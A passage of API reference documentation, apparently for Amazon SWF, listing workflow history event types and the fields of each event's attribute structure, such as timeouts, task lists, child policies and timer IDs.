* ``ActivityTaskFailed`` – An activity worker failed an activity task by calling RespondActivityTaskFailed .
* ``ActivityTaskScheduled`` – An activity task was scheduled for execution.
* ``ActivityTaskStarted`` – The scheduled activity task was dispatched to a worker.
* ``ActivityTaskTimedOut`` – The activity task timed out.
* ``CancelTimerFailed`` – Failed to process CancelTimer decision. This happens when the decision isn't configured properly, for example no timer exists with the specified timer Id.
* ``CancelWorkflowExecutionFailed`` – A request to cancel a workflow execution failed.
* ``ChildWorkflowExecutionCanceled`` – A child workflow execution, started by this workflow execution, was canceled and closed.
* ``ChildWorkflowExecutionCompleted`` – A child workflow execution, started by this workflow execution, completed successfully and was closed.
* ``ChildWorkflowExecutionFailed`` – A child workflow execution, started by this workflow execution, failed to complete successfully and was closed.
* ``ChildWorkflowExecutionStarted`` – A child workflow execution was successfully started.
* ``ChildWorkflowExecutionTerminated`` – A child workflow execution, started by this workflow execution, was terminated.
* ``ChildWorkflowExecutionTimedOut`` – A child workflow execution, started by this workflow execution, timed out and was closed.
* ``CompleteWorkflowExecutionFailed`` – The workflow execution failed to complete.
* ``ContinueAsNewWorkflowExecutionFailed`` – The workflow execution failed to complete after being continued as a new workflow execution.
* ``DecisionTaskCompleted`` – The decider successfully completed a decision task by calling RespondDecisionTaskCompleted .
* ``DecisionTaskScheduled`` – A decision task was scheduled for the workflow execution.
* ``DecisionTaskStarted`` – The decision task was dispatched to a decider.
* ``DecisionTaskTimedOut`` – The decision task timed out.
* ``ExternalWorkflowExecutionCancelRequested`` – Request to cancel an external workflow execution was successfully delivered to the target execution.
* ``ExternalWorkflowExecutionSignaled`` – A signal, requested by this workflow execution, was successfully delivered to the target external workflow execution.
* ``FailWorkflowExecutionFailed`` – A request to mark a workflow execution as failed, itself failed.
* ``MarkerRecorded`` – A marker was recorded in the workflow history as the result of a ``RecordMarker`` decision.
* ``RecordMarkerFailed`` – A ``RecordMarker`` decision was returned as failed.
* ``RequestCancelActivityTaskFailed`` – Failed to process RequestCancelActivityTask decision. This happens when the decision isn't configured properly.
* ``RequestCancelExternalWorkflowExecutionFailed`` – Request to cancel an external workflow execution failed.
* ``RequestCancelExternalWorkflowExecutionInitiated`` – A request was made to request the cancellation of an external workflow execution.
* ``ScheduleActivityTaskFailed`` – Failed to process ScheduleActivityTask decision. This happens when the decision isn't configured properly, for example the activity type specified isn't registered.
* ``SignalExternalWorkflowExecutionFailed`` – The request to signal an external workflow execution failed.
* ``SignalExternalWorkflowExecutionInitiated`` – A request to signal an external workflow was made.
* ``StartActivityTaskFailed`` – A scheduled activity task failed to start.
* ``StartChildWorkflowExecutionFailed`` – Failed to process StartChildWorkflowExecution decision. This happens when the decision isn't configured properly, for example the workflow type specified isn't registered.
* ``StartChildWorkflowExecutionInitiated`` – A request was made to start a child workflow execution.
* ``StartTimerFailed`` – Failed to process StartTimer decision. This happens when the decision isn't configured properly, for example a timer already exists with the specified timer Id.
* ``TimerCanceled`` – A timer, previously started for this workflow execution, was successfully canceled.
* ``TimerFired`` – A timer, previously started for this workflow execution, fired.
* ``TimerStarted`` – A timer was started for the workflow execution due to a ``StartTimer`` decision.
* ``WorkflowExecutionCancelRequested`` – A request to cancel this workflow execution was made.
* ``WorkflowExecutionCanceled`` – The workflow execution was successfully canceled and closed.
* ``WorkflowExecutionCompleted`` – The workflow execution was closed due to successful completion.
* ``WorkflowExecutionContinuedAsNew`` – The workflow execution was closed and a new execution of the same type was created with the same workflowId.
* ``WorkflowExecutionFailed`` – The workflow execution closed due to a failure.
* ``WorkflowExecutionSignaled`` – An external signal was received for the workflow execution.
* ``WorkflowExecutionStarted`` – The workflow execution was started.
* ``WorkflowExecutionTerminated`` – The workflow execution was terminated.
* ``WorkflowExecutionTimedOut`` – The workflow execution was closed because a time out was exceeded.
- **eventTimestamp** *(datetime) --*
The date and time when the event occurred.
- **eventType** *(string) --*
The type of the history event.
- **eventId** *(integer) --*
The system generated ID of the event. This ID uniquely identifies the event with in the workflow execution history.
- **workflowExecutionStartedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **input** *(string) --*
The input provided to the workflow execution.
- **executionStartToCloseTimeout** *(string) --*
The maximum duration for this workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **taskStartToCloseTimeout** *(string) --*
The maximum duration of decision tasks for this workflow type.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **childPolicy** *(string) --*
The policy to use for the child workflow executions if this workflow execution is terminated, by calling the TerminateWorkflowExecution action explicitly or due to an expired timeout.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **taskList** *(dict) --*
The name of the task list for scheduling the decision tasks for this workflow execution.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority of the decision tasks in the workflow execution.
- **workflowType** *(dict) --*
The workflow type of this execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **tagList** *(list) --*
The list of tags associated with this workflow execution. An execution can have up to 5 tags.
- *(string) --*
- **continuedExecutionRunId** *(string) --*
If this workflow execution was started due to a ``ContinueAsNewWorkflowExecution`` decision, then it contains the ``runId`` of the previous workflow execution that was closed and continued as this execution.
- **parentWorkflowExecution** *(dict) --*
The source workflow execution that started this workflow execution. The member isn't set if the workflow execution was not started by a workflow.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **parentInitiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this workflow execution. The source event with this ID can be found in the history of the source workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **lambdaRole** *(string) --*
The IAM role attached to the workflow execution.
- **workflowExecutionCompletedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **result** *(string) --*
The result produced by the workflow execution upon successful completion.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CompleteWorkflowExecution`` decision to complete this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **completeWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``CompleteWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CompleteWorkflowExecution`` decision to complete this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **reason** *(string) --*
The descriptive reason provided for the failure.
- **details** *(string) --*
The details of the failure.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``FailWorkflowExecution`` decision to fail this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **failWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``FailWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``FailWorkflowExecution`` decision to fail this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionTimedOutEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timeoutType** *(string) --*
The type of timeout that caused this event.
- **childPolicy** *(string) --*
The policy used for the child workflow executions of this workflow execution.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **workflowExecutionCanceledEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **details** *(string) --*
The details of the cancellation.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **cancelWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``CancelWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionContinuedAsNewEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionContinuedAsNew`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **input** *(string) --*
The input provided to the new workflow execution.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``ContinueAsNewWorkflowExecution`` decision that started this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **newExecutionRunId** *(string) --*
The ``runId`` of the new workflow execution.
- **executionStartToCloseTimeout** *(string) --*
The total duration allowed for the new workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **taskList** *(dict) --*
The task list to use for the decisions of the new (continued) workflow execution.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority of the task to use for the decisions of the new (continued) workflow execution.
- **taskStartToCloseTimeout** *(string) --*
The maximum duration of decision tasks for the new workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **childPolicy** *(string) --*
The policy to use for the child workflow executions of the new execution if it is terminated by calling the TerminateWorkflowExecution action explicitly or due to an expired timeout.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **tagList** *(list) --*
The list of tags associated with the new workflow execution.
- *(string) --*
- **workflowType** *(dict) --*
The workflow type of this execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **lambdaRole** *(string) --*
The IAM role to attach to the new (continued) workflow execution.
- **continueAsNewWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``ContinueAsNewWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``ContinueAsNewWorkflowExecution`` decision that started this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionTerminatedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionTerminated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **reason** *(string) --*
The reason provided for the termination.
- **details** *(string) --*
The details provided for the termination.
- **childPolicy** *(string) --*
The policy used for the child workflow executions of this workflow execution.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **cause** *(string) --*
If set, indicates that the workflow execution was automatically terminated, and specifies the cause. This happens if the parent workflow execution times out or is terminated and the child policy is set to terminate child executions.
- **workflowExecutionCancelRequestedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionCancelRequested`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **externalWorkflowExecution** *(dict) --*
The external workflow execution for which the cancellation was requested.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **externalInitiatedEventId** *(integer) --*
The ID of the ``RequestCancelExternalWorkflowExecutionInitiated`` event corresponding to the ``RequestCancelExternalWorkflowExecution`` decision to cancel this workflow execution.The source event with this ID can be found in the history of the source workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **cause** *(string) --*
If set, indicates that the request to cancel the workflow execution was automatically generated, and specifies the cause. This happens if the parent workflow execution times out or is terminated, and the child policy is set to cancel child executions.
- **decisionTaskScheduledEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskScheduled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **taskList** *(dict) --*
The name of the task list in which the decision task was scheduled.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
A task priority that, if set, specifies the priority for this decision task. Valid values are integers that range from Java's ``Integer.MIN_VALUE`` (-2147483648) to ``Integer.MAX_VALUE`` (2147483647). Higher numbers indicate higher priority.
For more information about setting task priority, see `Setting Task Priority <http://docs.aws.amazon.com/amazonswf/latest/developerguide/programming-priority.html>`__ in the *Amazon SWF Developer Guide* .
- **startToCloseTimeout** *(string) --*
The maximum duration for this decision task. The task is considered timed out if it doesn't completed within this duration.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **decisionTaskStartedEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **identity** *(string) --*
Identity of the decider making the request. This enables diagnostic tracing when problems arise. The form of this identity is user defined.
- **scheduledEventId** *(integer) --*
The ID of the ``DecisionTaskScheduled`` event that was recorded when this decision task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **executionContext** *(string) --*
User defined context for the workflow execution.
- **scheduledEventId** *(integer) --*
The ID of the ``DecisionTaskScheduled`` event that was recorded when this decision task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``DecisionTaskStarted`` event recorded when this decision task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskTimedOutEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timeoutType** *(string) --*
The type of timeout that expired before the decision task could be completed.
- **scheduledEventId** *(integer) --*
The ID of the ``DecisionTaskScheduled`` event that was recorded when this decision task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``DecisionTaskStarted`` event recorded when this decision task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskScheduledEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskScheduled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **activityType** *(dict) --*
The type of the activity task.
- **name** *(string) --*
The name of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **version** *(string) --*
The version of this activity.
.. note::
The combination of activity type name and version must be unique with in a domain.
- **activityId** *(string) --*
The unique ID of the activity task.
- **input** *(string) --*
The input provided to the activity task.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent workflow tasks. This data isn't sent to the activity.
- **scheduleToStartTimeout** *(string) --*
The maximum amount of time the activity task can wait to be assigned to a worker.
- **scheduleToCloseTimeout** *(string) --*
The maximum amount of time for this activity task.
- **startToCloseTimeout** *(string) --*
The maximum amount of time a worker may take to process the activity task.
- **taskList** *(dict) --*
The task list in which the activity task has been scheduled.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority to assign to the scheduled activity task. If set, this overrides any default priority value that was assigned when the activity type was registered.
Valid values are integers that range from Java's ``Integer.MIN_VALUE`` (-2147483648) to ``Integer.MAX_VALUE`` (2147483647). Higher numbers indicate higher priority.
For more information about setting task priority, see `Setting Task Priority <http://docs.aws.amazon.com/amazonswf/latest/developerguide/programming-priority.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision that resulted in the scheduling of this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **heartbeatTimeout** *(string) --*
The maximum time before which the worker processing this task must report progress by calling RecordActivityTaskHeartbeat . If the timeout is exceeded, the activity task is automatically timed out. If the worker subsequently attempts to record a heartbeat or return a result, it is ignored.
- **activityTaskStartedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **identity** *(string) --*
Identity of the worker that was assigned this task. This aids diagnostics when problems arise. The form of this identity is user defined.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskCompletedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **result** *(string) --*
The results of the activity task.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskFailedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **reason** *(string) --*
The reason provided for the failure.
- **details** *(string) --*
The details of the failure.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskTimedOutEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timeoutType** *(string) --*
The type of the timeout that caused this event.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **details** *(string) --*
Contains the content of the ``details`` parameter for the last call made by the activity to ``RecordActivityTaskHeartbeat`` .
- **activityTaskCanceledEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **details** *(string) --*
Details of the cancellation.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **latestCancelRequestedEventId** *(integer) --*
If set, contains the ID of the last ``ActivityTaskCancelRequested`` event recorded for this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskCancelRequestedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskcancelRequested`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelActivityTask`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityId** *(string) --*
The unique ID of the task.
- **workflowExecutionSignaledEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionSignaled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **signalName** *(string) --*
The name of the signal received. The decider can use the signal name and inputs to determine how to the process the signal.
- **input** *(string) --*
The inputs provided with the signal. The decider can use the signal name and inputs to determine how to process the signal.
- **externalWorkflowExecution** *(dict) --*
The workflow execution that sent the signal. This is set only of the signal was sent by another workflow execution.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **externalInitiatedEventId** *(integer) --*
The ID of the ``SignalExternalWorkflowExecutionInitiated`` event corresponding to the ``SignalExternalWorkflow`` decision to signal this workflow execution.The source event with this ID can be found in the history of the source workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event. This field is set only if the signal was initiated by another workflow execution.
- **markerRecordedEventAttributes** *(dict) --*
If the event is of type ``MarkerRecorded`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **markerName** *(string) --*
The name of the marker.
- **details** *(string) --*
The details of the marker.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RecordMarker`` decision that requested this marker. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **recordMarkerFailedEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **markerName** *(string) --*
The marker's name.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RecordMarkerFailed`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **timerStartedEventAttributes** *(dict) --*
If the event is of type ``TimerStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The unique ID of the timer that was started.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent workflow tasks.
- **startToFireTimeout** *(string) --*
The duration of time after which the timer fires.
The duration is specified in seconds, an integer greater than or equal to ``0`` .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartTimer`` decision for this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **timerFiredEventAttributes** *(dict) --*
If the event is of type ``TimerFired`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The unique ID of the timer that fired.
- **startedEventId** *(integer) --*
The ID of the ``TimerStarted`` event that was recorded when this timer was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **timerCanceledEventAttributes** *(dict) --*
If the event is of type ``TimerCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The unique ID of the timer that was canceled.
- **startedEventId** *(integer) --*
The ID of the ``TimerStarted`` event that was recorded when this timer was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelTimer`` decision to cancel this timer. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startChildWorkflowExecutionInitiatedEventAttributes** *(dict) --*
If the event is of type ``StartChildWorkflowExecutionInitiated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the child workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent decision tasks. This data isn't sent to the activity.
- **input** *(string) --*
The inputs provided to the child workflow execution.
- **executionStartToCloseTimeout** *(string) --*
The maximum duration for the child workflow execution. If the workflow execution isn't closed within this duration, it is timed out and force-terminated.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **taskList** *(dict) --*
The name of the task list used for the decision tasks of the child workflow execution.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority assigned for the decision tasks for this workflow execution. Valid values are integers that range from Java's ``Integer.MIN_VALUE`` (-2147483648) to ``Integer.MAX_VALUE`` (2147483647). Higher numbers indicate higher priority.
For more information about setting task priority, see `Setting Task Priority <http://docs.aws.amazon.com/amazonswf/latest/developerguide/programming-priority.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartChildWorkflowExecution`` Decision to request this child workflow execution. This information can be useful for diagnosing problems by tracing back the cause of events.
- **childPolicy** *(string) --*
The policy to use for the child workflow executions if this execution gets terminated by explicitly calling the TerminateWorkflowExecution action or due to an expired timeout.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **taskStartToCloseTimeout** *(string) --*
The maximum duration allowed for the decision tasks for this workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **tagList** *(list) --*
The list of tags to associated with the child workflow execution.
- *(string) --*
- **lambdaRole** *(string) --*
The IAM role to attach to the child workflow execution.
- **childWorkflowExecutionStartedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was started.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionCompletedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was completed.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **result** *(string) --*
The result of the child workflow execution.
- **initiatedEventId** *(integer) --*
